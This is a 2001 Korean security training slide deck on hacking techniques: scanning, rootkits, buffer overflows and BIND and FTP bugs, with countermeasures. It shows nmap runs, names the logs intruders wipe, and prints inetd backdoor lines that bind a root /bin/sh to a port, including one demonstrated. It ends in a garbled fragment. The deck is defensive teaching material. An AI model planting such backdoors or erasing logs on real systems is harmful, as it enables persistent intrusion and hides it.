해킹기법의 이해
제3차 보안운영전문 실무과정
해킹기법의 이해
2001. 04.
해킹바이러스상담지원센터
목차
. 해킹시나리오
. 최근해킹기법
. 버퍼오버플로우
. DNS보안
. 버그를 이용한 공격
. 서비스거부공격
해킹시나리오
. 1. 정보수집(1)
. Wide area network에 대한 무차별 스캔공격
. network scanner이용
. (nmap, vetescan,sscan 등등)
. http://www.insecure.org/nmap
해킹시나리오
. 1. 정보수집(2)
. 네트웍 스캐닝공격이란?
. 원격지에서 다수의 시스템에 대한 정보를 수집
하고자 하는 공격
. 이용 가능한 서비스와 포트를 이용함으로써 공
격에 이용할 수 있는 결함 찾아냄
. 초기의 스캔 도구는 관리자용으로 개발
해킹시나리오
. 2. Network상에 운영되고 있는 호스트 찾기
[jys@cyber118 nmap-2.53]$ ./nmap -sP 211.252.151.*
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Host (211.252.151.xxx) appears to be up.
Host (211.252.151.xxx) appears to be up.
Host (211.252.151.xxx) appears to be up.
Host (211.252.151.xxx) appears to be up.
Nmap run completed -- 256 IP addresses (4 hosts up) scanned in 5 seconds
해킹시나리오
. 3. 시스템 정보 획득
[root@cyber118 nmap-2.53]# ./nmap -I -O 211.252.150.xxx
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on 211.252.150.xxx):
(The 1506 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
98/tcp open linuxconf
111/tcp open sunrpc
113/tcp open auth
515/tcp open printer
587/tcp open submission
973/tcp open unknown
1024/tcp open kdm
1030/tcp open iad1
1031/tcp open iad2
1032/tcp open iad3
1241/tcp open msg
3001/tcp open nessusd
6000/tcp open X11
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 5 second
해킹시나리오
. 4. 목표시스템의 root permission획득
. 스니핑, 파일시스템에 존재하는 버그 있는
프로그램이나 exploit이용
. 5. 공격흔적 감추기
. /var/log/lastlog
. /var/log/utmp
. /var/log/wtmp
해킹시나리오
. 6. Backdoor(뒷문 프로그램)설치(1)
. 시스템 침입에 성공한 후 재 침입을 위해 만
들어둠
. log파일 남기지 않고 침입 가능
. 짧은 시간안에 시스템에 침입 가능
. 특정 ID나 패스워드 패턴에 따라 자동 로그
인 및 기록 없애주는 login등 설치
해킹시나리오
. 6. Backdoor(뒷문 프로그램)설치(2)
. /etc/inetd.conf등에 지정하여 원격지 컴퓨터에서 root
로 로그인
[root@cyber118 jys]# more /etc/inetd.conf
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
# Shell, login, exec, comsat and talk are BSD protocols.
#
#shell stream tcp nowait root /usr/sbin/tcpd in.rshd
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
9704 stream tcp nowait root /bin/sh sh -i
[root@mail /root]# telnet localhost 9704
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
bash# id
id
uid=0(root) gid=0(root) groups=0(root)
해킹시나리오
. 주로 변조 /이식되는 backdoor들
1. bindshell : 특정 포트에 루트쉘을 바인딩시켜 해당포트로 접속하면 루트권한 획
득
2. Inetd : 원격접근을 혀용하는 변조된 inetd 프로그램
3. Tcpd : 특정 커넥션을 숨기고, 연결이 거부(deny)되지 않도록 해주는 TCP-Wrapper
의 tcpd 프로그램
4. Chsh : 일반 사용자에서 루트권한 획득
5. crontab : 특정 Crontab 내용을 숨기는 프로그램
6. find : 특정파일에 지정된 내용을 숨겨주는 변조된 find 명령
7. ls : 특정파일에 지정된 내용을 숨겨주는 변조된 ls 프로그램
8. ps : 특정파일에 지정된 프로세스를 숨겨주는 ps 프로그램
9. netstat : 특정파일에 지정된 내용을 숨겨주는 변조된 netstat 프로그램
10. ifconfig : PROMISC flag를 숨겨주는 변조된 ifconfig 명령
해킹시나리오
. 주로 변조 /이식되는 backdoor들
11. linsniffer : 스니퍼 프로그램
12. login : 원격접근을 허용하는 변조된 login 프로그램
13. passwd : 일반 사용자에게 root권한을 주는 passwd 프로그램
14. rshd : 원격 접근을 제공하는 rshd 프로그램
15. sniffchk : 스니퍼가 실행되고 있는지 점검해주는 프로그램
16. Syslogd : 로그를 숨겨주는 syslogd 프로그램
17. Top : 프로세스를 숨겨주는 top 프로그램
: wtmp/utmp 파일 편집기(로그인 정보를 삭제할 때 사용됨) 18. wted
19. z2 : Zap2 utmp/wtmp/lastlog 삭제 프로그램
20. killall :침입자가 수행중인 작업을 관리자가 kill해도 종료되지 않음.
해킹시나리오
. Rootkit
. 시스템 침입 후 침입 사실을 숨기거나, 차후
의 침입을 위한 백도어등이 패키지화된 프로
그램의 모음
. Rootkit의 일반적인 설치장소
. /dev혹은 /usr/src/.puta(t0rn경우)밑에 많음
. (ls명령으로 보이지 않게 ls를 바꾸므로 발견하기
힘듬)
. Rootkit
해킹시나리오
. 알려진 rootkit패키지
. lrk(Linux RootKit)3, lrk4,lrk5
. t0rnkit
. Ambient’s Rootkit
. 계속해서 업그레이드 되는 형태
해킹시나리오
. t0rnkit
. 기존의 루트킷과 유사.
. 리눅스 시스템에서 빠르게 설치되도록 디자인.
. 설치 및 운영이 매우 간편.
. 공격툴을 컴파일된 실행파일 형태로 제공
. login, ls, ps, netstat 등 많은 시스템파일을 트로이쟌으로 변경
. login, ssh, finger 백도어 설치
. /usr/src/.puta : t0rnkit의 홈디렉토리 역할
. t0tnkit
해킹시나리오
[root@linux80 trojan]# ls -al /usr/src/.puta
total 23
drwxr-xr-x 2 root root 1024 Mar 2 17:13 .
drwxr-xr-x 5 root root 1024 Mar 2 17:13 ..
-rw-r--r-- 1 root root 22 Mar 2 17:13 .1addr
-rw-r--r-- 1 root root 72 Mar 2 17:13 .1file
-rw-r--r-- 1 root root 21 Mar 2 17:13 .1logz
-rw-r--r-- 1 root root 38 Mar 2 17:13 .1proc
-rwxr-xr-x 1 root root 7578 Aug 22 2000 t0rnp
-rwxr-xr-x 1 root root 6948 Aug 23 2000 t0rns
-rwxr-xr-x 1 root root 1345 Sep 10 1999 t0rnsb
해킹시나리오
. T0rnkit
. 대책
. NFS를 사용하지 않을 경우(rpc.statd가 필요없는 경우)에는 서
비스 중지
. # chkconfig --level 0123456 nfs off
. NFS 서비스가 필요할 경우 nfs-utils를 패치.
. CERTCC-KR 사고노트 : rpc.statd을 이용한 공격과
t0rnkit 트로이목마 설치
해킹시나리오
. 7. 다른 시스템 공격위한 툴 설치
. Rootkit설치후 다른 공격대상을 찾기 위해
scanning프로그램 설치
. Denial of services공격 툴 설치
. 다른 공격을 하기 위한 중간 경유지로 이용
하는 경우 많음
Buffer Overflow
. 음식 한꺼번에 많이 먹으면 탈나듯…
. 할당된 메모리의 양보다 더 많은 양의 데이터
를 메모리에 한번에 copy하여 다른 영역까지
영향을 미치는 방법
. stack 영역에서 return address 수정함으로써 프
로그램의 흐름을 바꿀 수 있음
. 궁극적으로 루트쉘 획득
Buffer Overflow
. Buffer Overflow 공격의 예
. popd/imapd공격
. pop과 imap 데몬 : 클라이언트에서 메일서버
에 접속하여 메일을 송·수신하도록 하는 서
비스를 제공.
. 서버가 사용자 인증과정시 그 길이에 대한
한계값 검사를 하지 않아 버퍼오버 플로우
취약점 가짐.
Buffer Overflow 공격의 예
. Linux amd Buffer Overflow
. amd란?
. 어떤 호스트에서 해당 서버의 파일을 읽으려
고 할때 자동으로 마운트할수 있도록하는
Automount데몬.
. 많은 리눅스 배포판에 포함된 am-utils패키
지에 amd 있음.
. 국내 많은 리눅스 배포판들이 RedHat 6.x 버
전을 사용
Buffer Overflow 공격의 예
. Linux amd Buffer Overflow
. amd 취약점으로 인해 원격지에서 시스템 관
리자 권한으로 임의의 명령 실행 가능
. 자동으로 amd버그를 공격할 수 있는 자동 공
격도구들이 인터넷에 공개
Buffer Overflow 공격의 예
. Linux amd Buffer Overflow 공격 흔적
[root@ log]# more messages
Aug 29 00:04:16 syslogd: Cannot glue message parts together
Aug 29 00:04:16 27>Aug 29 00:04:16 amd[465]: amq requested mount of
8 Jan 1998--str/bin/sh(-c)/bin/echo '2222 stream tcp nowait
root /bin/sh s
Buffer Overflow 공격의 예
/tmp/h라는 파일이 생성
[root@ /tmp]# more h
2222 stream tcp nowait root /bin/sh sh -i
[root@ /]# netstat -a | grep 2222
tcp 0 0 *:2222 *:* LISTEN Buffer Overflow 공격의 예
. Linux amd Buffer Overflow 대책
. 보안패치설치
. Intel: ftp://updates.redhat.com/6.0/i386/am-utils-6.0.1s11-1.6.0.i386.rpm
. Alpha: ftp://updates.redhat.com/6.0/alpha/am-utils-6.0.1s11-1.6.0.alpha.rpm
. SPARC: ftp://updates.redhat.com/6.0/sparc/am-utils-6.0.1s11-1.6.0.sparc.rpm
. Source: ftp://updates.redhat.com/6.0/SRPMS/am-utils-6.0.1s11-1.6.0.src.rpm
. Architecture neutral: ftp://updates.redhat.com/6.0/noarch/
. 다운로드 받은 파일을 다음과 같이 설치
. # rpm -Uvh "파일이름"
. amd 재실행
. # /etc/rc.d/init.d/amd restart
Buffer Overflow 공격의 예
. Linux amd Buffer Overflow 대책
. amd 서비스 중지
. amd서비스 실행여부 확인
. # ps ax | grep amd
. 444 ? S 0:00 /usr/sbin/amd -a /.automount -l syslog -
c 1000 /net /
. 실행되고 있는 프로세스를 kill
. # killall -9 amd
Buffer Overflow 공격의 예
. 부팅시 amd실행 금지
. runlevel 정보 확인
. # chkconfig --list amd
. amd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
. # chkconfig --level 0123456 amd off
. 모든 runlevel 부팅시 amd가 실행되지 않음을 확인
. # chkconfig --list amd
. amd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
DNS개요
. BIND란?
. DNS서비스를 구현해 주는 소프트웨어
. BIND 구성요소 : Client/Server 시스템
. 서버쪽의 데몬: named
. Client : 리졸버(resolver)
. 최근 DNS 관련 취약점을 이용한 공격 성
행
DNS 보안 취약점
. 외부에서 root권한을 획득 할 수 있는 버
그 존재
. BIND와 관련한 취약점들
. Inverse Query 취약점 (Buffer Overflow) : BIND 4.9.7이전 버전과 BIND
8.1.2 이전 버전
. NXT버그 (buffer overflow) : BIND 8.2, 8.2 p1, 8.2.1버전
. solinger버그 (Denial of Service) : BIND 8.1 이상버전
. fdmax 버그 (Denial of Service) : BIND 8.1 이상버전
. Zone 데이터베이스 정보유출 방지
. BIND 4.9.8 이전 버전, 8.2.3 이전 버전과 관련해
. TSIG 핸들링 버퍼오버플로우 취약점
. nslookupComplain() 버퍼오버플로우 취약점
. nslookupComplain() input validation 취약점
. information leak 취약점
DNS보안취약성
. BIND버그로 인한 공격 예- nxt bug
. bind 8.2부터 등장한 버그.
. Nxt버그를 이용하는 exploit code로 ADM named 8.2/8.2.1
remote overflow exploit라는 소스코드 인터넷에 공개.
. 이 exploit code를 목표시스템에 정하여 실행하면 목표시스템
에 root로 침입하여 /tmp/bob파일 생성
. “ ingreslock stream tcp nowait root /bin/sh /bin/sh -i”
. /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob 명령실행
. 침입당한 시스템에 /var/named/ADMROCKS 또는 /var/named/0
이라는 빈 디렉토리 생성
DNS보안
. DNS서버 사용하지 않는다면 실행하지
않거나 아예 제거.
. Named버전 확인
. #strings /usr/sbin/in.named | grep BIND (솔라
리스)
. rpm -q bind
. 최신 버전의 BIND사용
. ftp://ftp.isc.org/bind(현재는 BIND 9.0.0까지
나옴)
FTPD최신 버그 이용한 공격
. Wu-ftpd 2.6.0 의 리모트 루트 공격용 소
스가 인터넷에 공개
. 영향받는 버전(솔라리스는 해당 없음)
. wu-ftpd 2.6.0이전 버전
. BSD ftpd 5.51, 5.60
. proftpd
FTPD최신 버그 이용한 공격
F?1??